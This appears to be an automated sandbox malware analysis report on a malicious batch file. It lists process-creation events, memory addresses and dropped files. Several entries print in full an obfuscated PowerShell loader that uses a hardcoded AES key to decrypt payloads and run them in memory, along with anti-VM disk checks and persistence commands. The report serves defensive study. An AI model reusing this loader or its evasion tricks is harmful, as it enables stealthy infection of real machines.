Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CCD89423_2_000001E591CCD894
Source: C:\Windows\System32\conhost.exeCode function: 23_2_000001E591CC2FF023_2_000001E591CC2FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000002234E1023F026_3_000002234E1023F0
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000002234E10CC9426_3_000002234E10CC94
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000002234E10CE1826_3_000002234E10CE18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E132FF026_2_000002234E132FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13D89426_2_000002234E13D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E13DA1826_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E162FF026_2_000002234E162FF0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16D89426_2_000002234E16D894
Source: C:\Windows\System32\svchost.exeCode function: 26_2_000002234E16DA1826_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000023942AECE1827_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000023942AE23F027_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000023942AECC9427_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1DA1827_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B12FF027_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exeCode function: 27_2_0000023942B1D89427_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exeCode function: 28_3_000001EF056ACC9428_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exeCode function: 28_3_000001EF056A23F028_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exeCode function: 28_3_000001EF056ACE1828_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DD89428_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056D2FF028_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF056DDA1828_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570D89428_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF05702FF028_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001EF0570DA1828_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000002287A7D23F029_3_000002287A7D23F0
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000002287A7DCC9429_3_000002287A7DCC94
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000002287A7DCE1829_3_000002287A7DCE18
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD42FF029_2_000002287AD42FF0
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4D89429_2_000002287AD4D894
Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002287AD4DA1829_2_000002287AD4DA18
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001B94DA6CC9430_3_000001B94DA6CC94
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001B94DA623F030_3_000001B94DA623F0
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001B94DA6CE1830_3_000001B94DA6CE18
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9D89430_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA92FF030_2_000001B94DA92FF0
Source: C:\Windows\System32\svchost.exeCode function: 30_2_000001B94DA9DA1830_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_3_000002520254CE1831_3_000002520254CE18
Source: C:\Windows\System32\svchost.exeCode function: 31_3_00000252025423F031_3_00000252025423F0
Source: C:\Windows\System32\svchost.exeCode function: 31_3_000002520254CC9431_3_000002520254CC94
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257DA1831_2_000002520257DA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_0000025202572FF031_2_0000025202572FF0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_000002520257D89431_2_000002520257D894
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025ADA1831_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025A2FF031_2_00000252025A2FF0
Source: C:\Windows\System32\svchost.exeCode function: 31_2_00000252025AD89431_2_00000252025AD894
Source: C:\Windows\System32\svchost.exeCode function: 32_3_000001A9EBF923F032_3_000001A9EBF923F0
Source: C:\Windows\System32\svchost.exeCode function: 32_3_000001A9EBF9CE1832_3_000001A9EBF9CE18
Source: C:\Windows\System32\svchost.exeCode function: 32_3_000001A9EBF9CC9432_3_000001A9EBF9CC94
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE603A32_2_000001A9EBFE603A
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE600832_2_000001A9EBFE6008
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFC2FF032_2_000001A9EBFC2FF0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5FE932_2_000001A9EBFE5FE9
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE57B032_2_000001A9EBFE57B0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5F8F32_2_000001A9EBFE5F8F
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5F7F32_2_000001A9EBFE5F7F
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5F5032_2_000001A9EBFE5F50
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5F4032_2_000001A9EBFE5F40
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5F3032_2_000001A9EBFE5F30
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5F0032_2_000001A9EBFE5F00
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5EF032_2_000001A9EBFE5EF0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5EE032_2_000001A9EBFE5EE0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5EB032_2_000001A9EBFE5EB0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5EA032_2_000001A9EBFE5EA0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5E9032_2_000001A9EBFE5E90
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5DA032_2_000001A9EBFE5DA0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5D6032_2_000001A9EBFE5D60
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5D2032_2_000001A9EBFE5D20
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5D1032_2_000001A9EBFE5D10
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5C7F32_2_000001A9EBFE5C7F
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5C6032_2_000001A9EBFE5C60
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE5C1032_2_000001A9EBFE5C10
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCDA1832_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE59E032_2_000001A9EBFE59E0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE599032_2_000001A9EBFE5990
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE594032_2_000001A9EBFE5940
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE613832_2_000001A9EBFE6138
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE590032_2_000001A9EBFE5900
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE60FA32_2_000001A9EBFE60FA
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE60D932_2_000001A9EBFE60D9
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFCD89432_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EBFE608932_2_000001A9EBFE6089
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68D89432_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC68DA1832_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC682FF032_2_000001A9EC682FF0
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BD89432_2_000001A9EC6BD894
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6BDA1832_2_000001A9EC6BDA18
Source: C:\Windows\System32\svchost.exeCode function: 32_2_000001A9EC6B2FF032_2_000001A9EC6B2FF0
Source: C:\Windows\System32\svchost.exeCode function: 33_3_0000019FF160CE1833_3_0000019FF160CE18
Source: C:\Windows\System32\svchost.exeCode function: 33_3_0000019FF16023F033_3_0000019FF16023F0
Source: C:\Windows\System32\svchost.exeCode function: 33_3_0000019FF160CC9433_3_0000019FF160CC94
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163DA1833_2_0000019FF163DA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF1632FF033_2_0000019FF1632FF0
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF163D89433_2_0000019FF163D894
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19ADA1833_2_0000019FF19ADA18
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19AD89433_2_0000019FF19AD894
Source: C:\Windows\System32\svchost.exeCode function: 33_2_0000019FF19A2FF033_2_0000019FF19A2FF0
Source: Joe Sandbox ViewDropped File: C:\Windows\$nya-onimai2\IhrFKM.exe 878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4
Source: IhrFKM.exe.35.drStatic PE information: No import functions for PE file found
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2175
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2175Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2173Jump to behavior
Source: Process Memory Space: powershell.exe PID: 8164, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exes
Source: System.evtx.36.drBinary string: \Device\HarddiskVolume3\Windows\ImmersiveControlPanel\SystemSettings.exeX
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exer
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.36.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exee
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exec
Source: Security.evtx.36.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeProP**
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exem
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.36.drBinary string: O\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe,
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.36.drBinary string: \Device\HarddiskVolume3\Windows\System32\svchost.exeh
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.36.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.drBinary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.drBinary string: T\Device\HarddiskVolume3\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: System.evtx.36.drBinary string: C:\Device\HarddiskVolume3
Source: System.evtx.36.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.36.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4ic
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeA
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.36.drBinary string: \Device\HarddiskVolume3\Windows\System32\svchost.exeT
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.drBinary string: 5\Device\HarddiskVolume3\Windows\System32\services.exe
Source: System.evtx.36.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Security.evtx.36.drBinary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.syssio
Source: classification engineClassification label: mal100.spyw.evad.winBAT@32/74@2/1
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,14_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,14_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1504:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\7c3f3d12-14bf-4271-9822-a770c887ff1d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aekovv1.sfn.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression 